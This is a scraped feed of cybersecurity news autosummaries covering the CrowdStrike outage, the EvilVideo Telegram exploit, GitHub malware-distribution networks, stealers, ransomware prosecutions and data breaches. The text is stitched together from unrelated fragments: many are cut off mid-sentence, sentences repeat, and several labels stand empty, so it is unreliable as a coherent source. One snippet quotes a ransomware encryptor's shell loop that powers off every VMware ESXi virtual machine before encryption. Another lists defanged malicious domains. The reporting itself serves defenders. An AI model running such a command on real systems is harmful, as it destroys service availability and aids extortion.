"This ACR stealer hides its [command-and-control] with a dead drop resolver (DDR) technique on the Steam community website," Lin said, calling out its ability to siphon information from web browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers. "Autosummary:
"Autosummary:
"Autosummary:
Local developer testing Content update and rollback testing Stress testing, fuzzing, and fault injection Stability testing Content interface testing Moreover, additional validation checks will be added to the Content Validator, and error handling in the Content Interpreter will be improved to avoid such mistakes leading to inoperable Windows machines. "Autosummary:
The Dark Side of Innovation: Generative AI in Cybercrime A look at how GenAI tools are being used in cybercrime, including phishing attacks crafted with AI-generated content, the use of deepfakes for identity fraud, and AI-driven network intrusion techniques. "Check Point researchers have unearthed an extensive network of GitHub accounts that they believe provides malware and phishing link Distribution-as-a-Service. Set up and operated by a threat group the researchers dubbed as Stargazer Goblin, the “Stargazers Ghost Network” is estimated to encompass over 3,000 active accounts, some created by the group and others hijacked. “The network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine,” they found. The set-up … More
The post Network of ghost GitHub accounts successfully distributes malware appeared first on Help Net Security.
"Autosummary:
Similar to GitHub, other platforms can be utilized to legitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and channels, depending on the features each platform offers,” Terefos noted. "A bug in the Content Validator – a software element CrowdStrike relies on for testing and validating Rapid Response Content updates for its Falcon Sensors – is (partly) why the faulty update wasn’t caught in time, the company said. In a period of (approximately) an hour and 20 minutes on Friday, July 19, 2024, the defective update was delivered to around 8.5 million systems, and triggered a massive worldwide outage of Windows-based systems. CrowdStrike explains … More
The post CrowdStrike blames buggy testing software for disastrous update appeared first on Help Net Security.
"Autosummary:
The company has outlined what it intends to do to prevent incidents like these from happening again, and it includes: Implementing a variety of testing types for Rapid Response Content Adding additional validation checks to the Content Validator for Rapid Response Content Improving how the Content Interpreter handles errors Implementing a staggered deployment strategy for Rapid Response Content (which will include a canary deployment) and improving monitoring for glitches when the various rollout phases happen But, equally importantly, it promises to give customers some control over when the Rapid Response Content updates are deployed and to provide release notes for them. "Autosummary:
" Ratel, offered via a Telegram channel named "hamster_easy," is designed to impersonate the game ("Hamster.apk") and prompts users to grant it notification access and set itself as the default SMS application. "Attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files," security researcher Lukáš Štefanko said in a report. "Autosummary:
"After installing the January 2024 non-security update (KB5034203), released January 23, 2024, or later updates, some Windows devices which use the DHCP Option 235 for discovery of Microsoft Connected Cache (MCC) nodes in their network might be unable to use the MCC nodes," Microsoft said when it first confirmed the issue in April. "Autosummary:
In addition to the civil penalty, the FCC secured extra assignments for TracFone in the Consent Decree: TracFone has to deploy a mandated information security program, with novel provisions to reduce API vulnerabilities in ways consistent with widely accepted standards, like those identified by the National Institute of Standards and Technology (NIST) and the Open Worldwide Application Security Project (OWASP).Following three separate data breaches between 2021 and 2023 which exposed the proprietary information (PI) of TracFone Wireless customers, the Federal Communications Commission (FCC) announced that the Verizon-owned company has agreed to pay a $16 million civil penalty to settle the government investigation, and it has made an agreement to improve its application programming interface (API) security. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
As for what malware is distributed through the Stargazers Ghost Network"s operation, Check Point says it includes RedLine, Lumma Stealer, Rhadamanthys, RisePro, and Atlantida Stealer, among others. Stargazer repositories added daily on GitHub Source: Check Point Users arriving on GitHub repositories through malvertising, Google Search results, YouTube videos, Telegram, or social media are advised to be very cautious with file downloads and the URLs they click. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Joseph Cox – @josephfcox Episode links: Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device. "Autosummary:
"Autosummary:
"ESET researchers discovered a zero-day exploit, which targets the Telegram app for Android, that appeared for sale for an unspecified price in an underground forum post from June 2024. Example of how the EvilVideo exploit appears on Telegram (source: ESET) Using the exploit to abuse a vulnerability that ESET named “EvilVideo,” attackers could share malicious Android payloads via Telegram channels, groups, and chats, and make them appear to be multimedia files. “We found the exploit … More
The post Vulnerability in Telegram app for Android allows sending malicious files disguised as videos appeared first on Help Net Security.
"Autosummary:
Using the exploit to abuse a vulnerability that ESET named “EvilVideo,” attackers could share malicious Android payloads via Telegram channels, groups, and chats, and make them appear to be multimedia files. "Autosummary:
"Autosummary:
"Autosummary:
Once active on the system, the stealer harvests account credentials, browser history, and authentication cookies stored in Chrome, Edge, Firefox, and the Cốc Cốc web browsers. "Autosummary:
"Strata Identity announced Identity Continuity, an addition to its Maverics Identity Orchestration platform. This new premium offering ensures business continuity and uninterrupted application access by seamlessly failing over from a primary cloud Identity Provider (IDP) to a secondary IDP, using an on-premises IDP or cloud-to-cloud failover capabilities. “In many sectors, especially financial services, system outages to critical applications have become extremely damaging to the business. Uptime for business-critical applications is often tied to uptime of … More
The post Strata Identity Continuity prevents mission-critical applications from going offline appeared first on Help Net Security.
"Autosummary:
These interruptions, whether due to SaaS misconfigurations, natural disasters, malicious attacks, or platform outages, can halt business operations, leading to revenue loss, productivity decline, and reputational damage. "Autosummary:
"The group can create versions of its tools targeting most major operating system platform," Symantec said, adding it has "seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS. "Autosummary:
It"s also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY. "Autosummary:
The company advises industrial organizations to implement the SANS 5 Critical Controls for World-Class OT Cybersecurity, including "ICS incident response, defensible architecture, ICS network visibility and monitoring, secure remote access, and risk-based vulnerability management." "Autosummary:
" The other two data breach incidents concern TracFone"s order websites, reported on December 20, 2022, and January 13, 2023, respectively. "Autosummary:
The Hamster Kombat app interface Source: BleepingComputer Targeting the "hamsters" Although a clone app on Google Play named "Hamster Kombat – Earn Crypto," the genuine project isn"t available on any official channels but Telegram, making those interested in joining easy prey for cybercriminals and scammers. "Autosummary:
FrostyGoop ICS malware targets Ukraine Pierluigi Paganini July 23, 2024 July 23, 2024 In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. "ESET Research has discovered a sophisticated Chinese browser injector: a signed, vulnerable, ad-injecting driver from a mysterious Chinese company. This threat, which ESET dubbed HotPage, comes self-contained in an executable file that installs its main driver and injects libraries into Chromium-based browsers. The Chinese company’s certified products listed in the Windows Server Catalog (source: ESET) Posing as a security product capable of blocking advertisements, it actually introduces new ads. Additionally, the malware can replace the … More
The post Ad-injecting malware posing as DwAdsafe ad blocker uses Microsoft-signed driver appeared first on Help Net Security.
"Autosummary:
According to available information, the business scope of the company includes technology-related activities such as development, services, and consulting – but also advertising activities.Additionally, the malware can replace the content of the current page, redirect the user, or simply open a new tab to a website full of other ads. "In this Help Net Security interview, Saira Jesani, Executive Director of the Data & Trust Alliance, discusses the role of data provenance in AI trustworthiness and its impact on AI models’ performance and reliability. Jesani highlights the collaborative process behind developing cross-industry metadata standards to address widespread data provenance challenges and ensure applicability across various sectors. Can you explain why data provenance is critical for AI trustworthiness and how it impacts AI models’ overall performance … More
The post Cross-industry standards for data provenance in AI appeared first on Help Net Security.
"Autosummary:
This diverse group of contributors with functions including chief technology officers, chief data officers, and leaders in data governance, data acquisition, data quality, privacy, legal, and compliance ensured that the standards address common challenges and needs across multiple industries.They included American Express, Humana, IBM, Mastercard, Nielsen, Pfizer, UPS, and Walmart.As AI systems become more integrated into various sectors, the adoption of these standards can help ensure that data used in AI applications is reliable and legally compliant, thereby mitigating risks related to privacy, copyright, and brand protection. "Autosummary:
Manufacturing, professional services, construction, IT, retail, financial services, transportation, media, legal services, and real estate are some of the top industries affected by the Play ransomware during the time period. "Autosummary:
These malicious installations are designed to connect to an actor-controlled domain ("rosettahome[.]cn" or "rosettahome[.]top"), essentially acting as a command-and-control (C2) server to collect host data, transmit payloads, and push further commands. "Autosummary:
Prompt to launch an external video player Source: ESET Next, an additional step is required: the victim must enable the installation of unknown apps from the device settings, allowing the malicious APK file to install on the device. Step requiring the approval of APK installation Source: ESET Though the threat actor claims the exploit is "one-click," the fact that it requires multiple clicks, steps, and specific settings for a malicious payload to be executed on a victim"s device significantly reduces the risk of a successful attack. "Autosummary:
"The Court experienced an unprecedented cyber-attack on Friday which has resulted in the need to shut down nearly all network systems in order to contain the damage, protect the integrity and confidentiality of information and ensure future network stability and security," Presiding Judge Samantha P. Jessner said. "Autosummary:
Cybercriminals could gain access to corporate data, cloud applications, and storage, opening up a Pandora"s box of security risks, including data breaches, intellectual property theft, and reputational damage.Reusing passwords You can have an effective password policy in place, but if your employees are reusing their passwords on less-secure personal devices, websites, and applications, then they’re still leaving the door wide open for cybercriminals. To prevent these mix-ups, consider requiring encryption for sensitive emails, implementing pop-up reminders for double-checking addresses, and deploying data loss prevention solutions that act as a safety net. "Autosummary:
The stolen data includes email addresses, usernames, passwords, phone numbers, IP addresses, full names, and may contain other compromised user details. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
"Autosummary:
vCISO Reporting Benefits Drilling down into the aforementioned purpose, vCISO reporting provides multiple benefits for both the vCISO and the client: For the vCISO - Ensuring the vCISO is aligned with client expectations Ensuring the client understands their security and compliance posture Creating a shared vision between the vCISO and the client Build consensus on an improvement path (rather than solely pushing recommendations one-sidedly) Anchoring initiatives into business outcomes Driving retention and sales For the client - Controlling their security destiny Designing their security journey based on business outcomes and allowing them to own the risk associated with their decisions and actions Simplified decision-making Noise reduction Bandwidth and scale Getting easy buttons and resources for tactical execution Ensuring they perceive the high ROI being provided for their vCISO investment 4 Essential Sections of a vCISO Report To uncover all the benefits listed above, it is recommended to create a report that covers four sections: Section 1: General Recap - The summary, top-level metrics and any "hot stove" items.Recently, we published a comprehensive playbook for vCISOs, "Your First 100 Days as a vCISO – 5 Steps to Success", which covers all the phases entailed in launching a successful vCISO engagement, along with recommended actions to take, and step-by-step examples. A roadmap review, holding a business-led discussion, recommendations and mapping the RCT (Resource, Commitment, Time) for the next steps.Section 3: Strategic Review - A roadmap review, holding a business-led discussion, recommendations and mapping the RCT (Resource, Commitment, Time) for the next steps. "Autosummary:
SocGholish malware used to spread AsyncRAT malware Pierluigi Paganini July 22, 2024 July 22, 2024 The JavaScript downloader SocGholish (aka FakeUpdates) is being used to deliver the AsyncRAT and the legitimate open-source project BOINC. "Autosummary:
The US Treasury mentions the example of Dmitry Khoroshev, the leader of the LockBit ransomware operation, sanctioned in May 2024, as well as Aleksandr Gennadievich Ermakov, a Russian national and a member of the REvil ransomware group, sanctioned in January 2024. "Autosummary:
To power off all running VMware ESXi virtual machines so that they can be encrypted, Trend Micro says the encryptor will execute the following code: /bin/sh -c "for vmid in $(vim-cmd vmsvc/getallvms | grep -v Vmid | awk "{print $1}"); do vim-cmd vmsvc/power.off $vmid; done" As BleepingComputer found while analyzing it, this variant is designed to specifically target VMFS (Virtual Machine File System), which is used by VMware"s vSphere server virtualization suite. "Autosummary:
Delta Airlines, one of the most affected firms, had cancelled more than 4,000 flights since Friday, including more than 700 on Monday, according to outside tracking firm, Flight Aware. "Autosummary:
"Autosummary:
ESET identified the Telegram channel, and obtained it Exploiting the #EvilVideo vulnerability on Telegram We discovered a 0-day Telegram for Android exploit that allows sending malicious apps disguised as videoshttps://t.co/fb9FmhFJWV @ESETresearch @ESET pic.twitter.com/cLxUxnAaTB — Lukas Stefanko (@LukasStefanko) July 22, 2024 The exploit likely uses the Telegram API to upload specially crafted multimedia files, making the payload appear as a 30-second video rather than a binary attachment. "Autosummary:
"Autosummary:
Underground forum post advertising an Android cryptor-as-a-service Vulnerability report After discovering the EvilVideo vulnerability on June 26th, 2024, we followed our coordinated disclosure policy and reported it to Telegram, but received no response at the time.Using the exploit to abuse a vulnerability that we named EvilVideo, attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files. We were able to locate an example of the exploit, allowing us to analyze it further, and report it to Telegram on June 26th, 2024.Explanation of the EvilVideo vulnerability Key points of the blogpost: On June 26 th , 2024 in an underground forum, we found an advertisement for a zero-day exploit that targets Telegram for Android. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-34102 Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability CVE-2024-28995 SolarWinds Serv-U Path Traversal Vulnerability CVE-2022-22948 VMware vCenter Server Incorrect Default File Permissions Vulnerability Below are the descriptions of the flaws added to the KEV catalog: CVE-2024-34102 (CVSS score of 9.8) – the flaw is an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary code execution. "Autosummary:
"Autosummary:
Computer crashes led to thousands of flights being canceled, disrupted activity at financial companies, brought down hospitals, media organizations, railways, and even impacted emergency services. "Autosummary:
Computer crashes led to thousands of flights being canceled, disrupted activity at financial companies, brought down hospitals, media organizations, railways, and even impacted emergency services. "Autosummary:
"Autosummary:
In May 2023, the US Justice Department charged Russian national Mikhail Pavlovich Matveev (30), aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar, for his alleged role in multiple ransomware attacks.On April 26, 2021, Matveev and his Babuk coconspirators hit the Metropolitan Police Department in Washington, D.C. The Russian citizen was charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. "Autosummary:
Scam warning as fake emails and websites target users after outage 3 hours ago By Joe Tidy , Cyber correspondent, BBC World Service Share Reuters Cyber-security experts and agencies around the world are warning people about a wave of opportunistic hacking attempts linked to the IT outage. "Autosummary:
"Autosummary:
"Autosummary:
Between 2021 and 2023, Vasiliev (aka Ghostrider, Free, Digitalocean90, Digitalocean99, Digitalwaters99, and Newwave110) also used LockBit ransomware in at least 12 attacks against victims worldwide, including businesses in New Jersey, Michigan, the United Kingdom, and Switzerland, causing at least $500,000 in damage and losses, according to the guilty plea. "Autosummary:
" Astamirov (aka BETTERPAY, offtitan, and Eastfarmer) is said to have deployed LockBit against at least 12 victims between 2020 and 2023, receiving $1.9 million in ransom payments from victims located in the U.S. state of Virginia, Japan, France, Scotland, and Kenya. "Autosummary:
"Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. The number of data breaches where driver’s license data was stolen totaled 198 instances in pre-pandemic, full-year 2019 compared to 636 in full-year 2023 and 308 through June 30, 2024.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Protecting yourself after a data breach There are some actions you can take if you are, or suspect you may have been, the victim of a data breach. "The world is 16+ hours into what looks like the biggest IT outage in history, triggered by a defective update for Crowdstrike endpoint security software for Windows machines. The price of both Crowdstrike’s and Microsoft’s shares has tumbled down as a result, and the companies are offering (and updating) advice on how organizations can recover affected workstations and endpoints. The restoration might not be that much of a problem for organizations in the IT sector … More
The post Update: Worldwide IT outage due to buggy Crowdstrike update appeared first on Help Net Security.
"Autosummary:
The restoration might not be that much of a problem for organizations in the IT sector and with a healthy number of IT staff, but will likely be a long process for companies that have outsourced their IT department or have a huge number of affected Windows-based systems that are scattered and cannot be quickly serviced en masse (e.g., information kiosks, display systems, PoS systems, etc.). "Autosummary:
The stolen data includes the reason for the prescription and instructions, full name, title, date of birth, gender, email address, address, phone number, individual healthcare identifier (IHI), Medicare card number, including individual identifier, and expiry, Pensioner Concession card number and expiry, Commonwealth Seniors card number and expiry, Healthcare Concession card number and expiry, Department of Veterans’ Affairs (DVA) (Gold, White, Orange) card number and expiry, prescription medication, including name of drug, strength, quantity and repeats; and reason for prescription and instructions. "Autosummary:
"We"re deeply sorry for the impact that we"ve caused to customers, to travellers, to anyone affected by this, including our company," he told the NBC network. "Autosummary:
If a software update process fails, it can lead to catastrophic consequences, as seen today with widespread blue screens of death blamed on a bad update by CrowdStrike Cybersecurity is often about speed; a threat actor creates a malicious attack technique or code, cybersecurity companies react to the new threat and if necessary, adjust and adopt methods to detect the threat. "Autosummary:
"Autosummary:
"A recently fixed vulnerability (CVE-2024-36991) affecting Splunk Enterprise on Windows “is more severe than it initially appeared,” according to SonicWall’s threat researchers. Several PoC exploits have been published, including one by IT consultant Mohamed Nabil Ali that performs bulk scanning for vulnerable internet-facing endpoints and attempts to read the /etc/passwd file. About CVE-2024-36991 Splunk Enterprise is a data analytics and monitoring platform that allows organization to collect and analyze machine-generated data from a variety of … More
The post Critical Splunk flaw can be exploited to grab passwords (CVE-2024-36991) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Not only that, they have developed a kernel component with a large set of techniques to manipulate processes, but they also went through the requirements imposed by Microsoft to obtain a code-signing certificate for their driver component." "Autosummary:
Time-sensitive, high-value travel transactions enable quick monetization, often before fraud is detected, resulting in financial losses, damaged customer trust, and harm to the company"s reputation.Therefore, Imperva advocates for layered defenses, including user behavior analysis, profiling, and fingerprinting, as essential measures for the travel industry. Imperva suggests several quick wins, such as blocking outdated browser versions, restricting access from bulk IP data centers, and implementing detection strategies for signs of automation, like unusually fast interactions.These are some of the most common ways travel-related applications are targeted daily: Fare Scraping: The use of bots to aggregate pricing information, inventories, discounted fares, and more. "Autosummary:
"Autosummary:
Fifa is also investigating the video, in which several members of the Argentina squad - celebrating their 1-0 win over Colombia in the final - take part in a song originally sung by Argentina fans questioning the heritage of France"s black and mixed-race players. "Autosummary:
With over 300,000 customers worldwide at the time, SolarWinds serviced 96% of Fortune 500 companies, including high-profile tech companies like Apple, Google, and Amazon, and government organizations like the U.S. Military, Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States. "Autosummary:
usa-online-degree-29o[.]bond bra-portable-air-conditioner-9o[.]bond uk-river-cruises-8n[.]bond ai-courses-17621[.]bond app-software-development-training-52686[.]bond assisted-living-11607[.]bond online-jobs-42681[.]bond perfumes-76753[.]bond security-surveillance-cameras-42345[.]bond yoga-classes-35904[.]bond The researchers say that “connecting the Revolver Rabbit RDGA to an established malware after months of tracking highlights the importance of understanding RDGAs as a technique within the threat actor’s toolbox.” "Autosummary:
"Based on our investigation of the incident, we determined that an unauthorized third party obtained access to our environment from March 1, 2024 to March 10, 2024," MarineMax said. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Reportedly, the stolen data appears to be limited to purchases made between June 6, 2017, and July 30, 2018.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
"Autosummary:
The ransom note left behind by HardBit asks victims to make contact via TOX, an open-source peer-to-peer secure messaging platform. Image So, if they don"t appear to have a leak site on the dark web, how are you supposed to negotiate the ransom payment? "Autosummary:
The infection process starts with phishing messages impersonating security and diplomatic organizations, and contain a malicious executable that, upon opening, leads to the download of a Visual Basic Script (VBS), which, in turn, retrieves a PowerShell script to harvest user account, system and network information as well as enumerate files and processes. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
“As disclosed in the Original Report, on March 10, 2024, we determined that the Company experienced a “cybersecurity incident,” as defined in applicable SEC rules, whereby a third party gained unauthorized access to portions of our information environment (the “Incident”). "Autosummary:
Void Banshee exploits CVE-2024-38112 zero-day to spread malware Pierluigi Paganini July 17, 2024 July 17, 2024 Void Banshee APT group exploited the Windows zero-day CVE-2024-38112 to execute code via the disabled Internet Explorer. "Autosummary:
"Autosummary:
"Autosummary:
"This data included purchaser name, address, date of birth and driver’s license number or other form of government-issued ID presented at the time of a purchase between June 6, 2017, and July 30, 2018. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The sectors targeted include airlines, IT companies, telecoms, pharma, automotive manufacturing, logistics, travel, and tourism. "Autosummary:
Atlantida, modeled on open-source stealers like NecroStealer and PredatorTheStealer, is designed to extract files, screenshots, geolocation, and sensitive data from web browsers and other applications, including Telegram, Steam, FileZilla, and various cryptocurrency wallets. "Autosummary:
"Autosummary:
"Autosummary:
TechCrunch reported that the ban will start on July 20, however, the company’s activities, including software updates to its US customers, will be prohibited on September 29.Kaspersky leaves U.S. market following the ban on the sale of its software in the country Pierluigi Paganini July 16, 2024 July 16, 2024 Kaspersky is leaving the U.S. market following the recent ban on the sales of its software imposed by the Commerce Department. "Autosummary:
"Autosummary:
"Autosummary:
" Trustwave says that the threat actors take out thousands of ads for each campaign, with the top campaigns named blue-softs (8,100 ads), xtaskbar-themes (4,300 ads), newtaskbar-themes (2,200 ads), and awesome-themes-desktop (1,100 ads). Facebook advertising The threat actors take out advertisements that promote Windows themes, free game downloads, and software activation cracks for popular applications, like Photoshop, Microsoft Office, and Windows. "Autosummary:
Since it surfaced, it has slowly expanded its attacks to cyber-espionage campaigns against government and defense entities in Central and Southwest Asia, as well as organizations from North America, Europe, and Asia [1, 2, 3]. "Autosummary:
SEXi ransom note Source: BleepingComputer Cybersecurity researcher Will Thomas later found other variants that use the names SOCOTRA, FORMOSA, and LIMPOPO. "Autosummary:
"Autosummary:
Last month, cybersecurity firm Resecurity noted that cybercriminals are promoting another new phishing kit named V3B on Telegram and the dark web, which is capable of targeting customers of major banks in Ireland, the Netherlands, Finland, Austria, Germany, France, Belgium, Greece, Luxembourg, and Italy. "Autosummary:
Ransomware activity continues to "remain on an upward trend" in 2024, with ransomware actors claiming 962 attacks in the first quarter of 2024, up from 886 attacks reported year-over-year. "Autosummary:
Tracking, data brokers, and leaks Data brokers vacuum up your personal information from publicly available sources (government licenses/registrations), commercial sources (business partners like credit card providers or stores) as well as by tracking your online activities (activities on social media, ad clicks, etc.), before selling your information to others. Looking for victims Naturally, the more companies, sites, and apps you share your personal information with, the more detailed your personal “marketing profile” is.These often involve pig butchering, cryptocurrency schemes, romance scams, and tech support fraud, each of which spins a compelling yarn and preys on some of what actually makes us human. Various online services require your phone number, be it to confirm your identity, to place an order, or to serve as an authentication factor.Stolen accounts: Various online services require your phone number, be it to confirm your identity, to place an order, or to serve as an authentication factor. , ideally using dedicated security keys, apps, or biometrics instead of SMS-based verification. "Autosummary:
"Autosummary:
In that time, President Lula"s comeback has given renewed force to one of the world"s most unlikely economic alliances - the Brics, a grouping that unites Brazil with Russia, India, China and South Africa. 4 days ago By Robert Plummer , BBC News Share Getty Images Lula"s Brazil is keen to promote the Brics, but it is dwarfed by Xi Jinping"s China It"s been more than a year-and-a-half since Brazil"s Luiz Inácio Lula da Silva returned to the country"s presidency, back from the political dead after his conviction on corruption charges was dramatically annulled.Rodrigo Zeidan, a Brazilian economist based at China"s New York University Shanghai, tells the BBC that Brazil and China alike see the Brics as a "hedge" in terms of global alliances, rather than as a top priority. "Autosummary:
During the examined period, the most targeted flaws were CVE-2023-50164 and CVE-2022-33891 in Apache products, CVE-2023-29298, CVE-2023-38203 and CVE-2023-26360 in Coldfusion, and CVE-2023-35082 in MobileIron. "Autosummary:
"After installing the June 2024 Windows preview update, released June 25, 2024 (KB5039302) and later updates, you might face issues using Windows Update Agent API (WUA) from your script (PowerShell, VBScript, etc.) "Autosummary:
" AT&T"s list of MVNOs includes Black Wireless, Boost Infinite, Consumer Cellular, Cricket Wireless, FreedomPop, FreeUp Mobile, Good2Go, H2O Wireless, PureTalk, Red Pocket, Straight Talk Wireless, TracFone Wireless, Unreal Mobile, and Wing. "Autosummary:
The list of high-profile victims to which AT&T is being added now includes Advance Auto Parts, Pure Storage, Los Angeles Unified, Neiman Marcus, Ticketmaster, and Banco Santander. "Autosummary:
In a filing with the Securities and Exchange Commission (SEC), AT&T said: “On April 19, 2024, AT&T Inc. (“AT&T”) learned that a threat actor claimed to have unlawfully accessed and copied AT&T call logs.” Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.In a déjà-vu nightmare, US phone giant AT&T has notified customers that cybercriminals managed to download phone call and text message records of “nearly all of AT&T cellular customers from May 1, 2022 to October 31, 2022 as well as on January 2, 2023”. "Autosummary:
"In the meantime, we can confirm that no social security numbers, financial information, or patient information were impacted by this incident," the company added. "Autosummary:
Parental monitoring apps present their own complications—particularly when they’re used non-consensually against children—as they can give parents a near-omniscient, unfiltered view into their children’s lives, granting them access to text messages, shared photos, web browsing activity, locations visited, and call logs. "Autosummary:
" "As of July 10, 2024, Censys observes 1,567,109 publicly exposed Exim servers running a potentially vulnerable version (4.97.1 or earlier), concentrated mostly in the United States, Russia, and Canada," the company added. "Autosummary:
On its website, in its "About" section, RansomHub says that it does not allow attacks on "CIS, Cuba, North Korea, and China." It operates a ransomware-as-a-service (RaaS) operation, meaning that a central core of the group creates and maintains the ransomware code and infrastructure, and rents it out to other cybercriminals who act as affiliates. So, making life harder for LockBit didn"t get rid of the ransomware problem... ...it just drove it elsewhere, yes. "Autosummary:
"This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware," security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan said. "Autosummary:
" What You"ll Learn: In this webinar, Tim Chase will delve into the world of compromised credentials, covering: The Anatomy of an Attack : Understand how attackers steal and exploit credentials through phishing and brute force. "Autosummary:
"Autosummary:
" At the heart of the operation is a network of bulletproof hosting providers encompassing Aeza, Evil Empire, GIR, and TNSECURITY, which have also harbored command-and-control domains for different malware families like Stealc, Amadey, Agent Tesla, Glupteba, Raccoon Stealer, RisePro, RedLine Stealer, RevengeRAT, Lumma, Meduza, and Mystic. "Using this tool, RT affiliates disseminated disinformation to and about a number of countries, including the United States, Poland, Germany, the Netherlands, Spain, Ukraine, and Israel," law enforcement agencies from Canada, the Netherlands, and the U.S. said. "Autosummary:
"Autosummary:
On June 5, 2024, a threat actor known as "Sp1d3r" began selling a massive 3TB database allegedly containing 380 million Advance customer records, orders, transaction details, and other sensitive information. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
It"s also tracked by the broader cybersecurity community under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, Earth Baku, HOODOO, Red Kelpie, TA415, Wicked Panda, and Winnti. "Autosummary:
"The majority of the custom code in the malware appears to be focused on anti-analysis, communicating with its command-and-control center (C2), and downloading and running files with a limited focus on monitoring or harvesting credentials," it said. "Autosummary:
The most attacked country during the time period was China, followed by Turkey, Singapore, Hong Kong, Russia, Brazil, Thailand, Canada, Taiwan, and Kyrgyztan. "Autosummary:
Retailers in Bhutan, Mauritius, Nepal, Singapore, Sri Lanka and UAE will take UPI payments.“While digital payments are convenient, they do come with vulnerabilities," says Shashank Shekhar, founder of the Delhi-based Future Crime Research Foundation.There"s the fear of being robbed or, as I am not a licensed vendor, the local body can come and dismantle my store anytime," he says. "Autosummary:
Once executed, the malware will steal all credentials stored in the browser, cookies, browser history, cryptocurrency wallets, Steam credentials, and other sensitive data. "Autosummary:
"Autosummary:
Ticket Heist website for UEFA EURO 24 Championship source: QuoIntelligence Additionally, the researchers discovered websites in this fraudulent activity that claimed to sell tickets to music concerts featuring famous bands like Twenty One Pilots, Iron Maiden, Metallica, Rammstein, and musicians (Bruno Mars, Ludovico Einaudi). “For example, a random event and seat location on the official website could cost less than EUR 100, whereas the same tickets and locations on the fraudulent websites were priced at a minimum of EUR 300, often reaching EUR 1,000” - QuoIntelligence QuoIntelligence threat researcher Andrei Moldovan told BleepingComputer that while there is no confirmation, the higher prices could be part of a trick to make victims believe they get “premium treatment” for the extra money since the tickets are not available through the official distribution channels. "Autosummary:
The GitLab DevSecOps platform has over 30 million registered users and is used by over 50% of Fortune 100 companies, including T-Mobile, Goldman Sachs, Airbus, Lockheed Martin, Nvidia, and UBS. "Autosummary:
Scheduled tasks added by ViperSoftX Source: Trellix Stealthy operation By using CLR to load and execute PowerShell commands within the AutoIt environment, ViperSoftX seeks to blend into legitimate activities on the system and evade detection. "Autosummary:
Group-IB said it observed the actor exploiting Veeam flaw CVE-2023-27532 with an aim to enable xp_cmdshell on the backup server and create a rogue user account named "VeeamBkp," alongside conducting network discovery, enumeration, and credential harvesting activities using tools like NetScan, AdFind, and NitSoft via the newly created account. "Autosummary:
" Rounding off the long list of patches is CVE-2024-38021 (CVSS score: 8.8), a remote code execution flaw in Microsoft Office that, if successfully exploited, could permit an attacker to gain high privileges, including read, write, and delete functionality. The two security shortcomings that have come under exploitation are below - CVE-2024-38080 (CVSS score: 7.8) - Windows Hyper-V Elevation of Privilege Vulnerability (CVSS score: 7.8) - Windows Hyper-V Elevation of Privilege Vulnerability CVE-2024-38112 (CVSS score: 7.5) - "Autosummary:
Executing the shortcut file initiates a multi-stage infection sequence that begins with the extraction of PowerShell code that unhides the concealed folder and sets up persistence on the system to launch an AutoIt script that, in turn, interacts with the .NET CLR framework, to decrypt and run a secondary PowerShell script, which is ViperSoftX. "AutoIt does not by default support the .NET "Autosummary:
"Autosummary:
"Microsoft is suffering cybersecurity failures due to systemic problems with strategic leadership. The world is witnessing an alarming trend of cybersecurity issues with Microsoft products and services. Over the past several years, Microsoft has suffered several serious attacks with cloud and email environments being compromised. In some cases, customers were kept in the dark, giving attackers additional time to exploit victims and entrench themselves deeper to the detriment of those affected. Microsoft ignored foundational aspects … More
The post Microsoft’s cybersecurity dilemma: An open letter to Satya Nadella appeared first on Help Net Security.
"Autosummary:
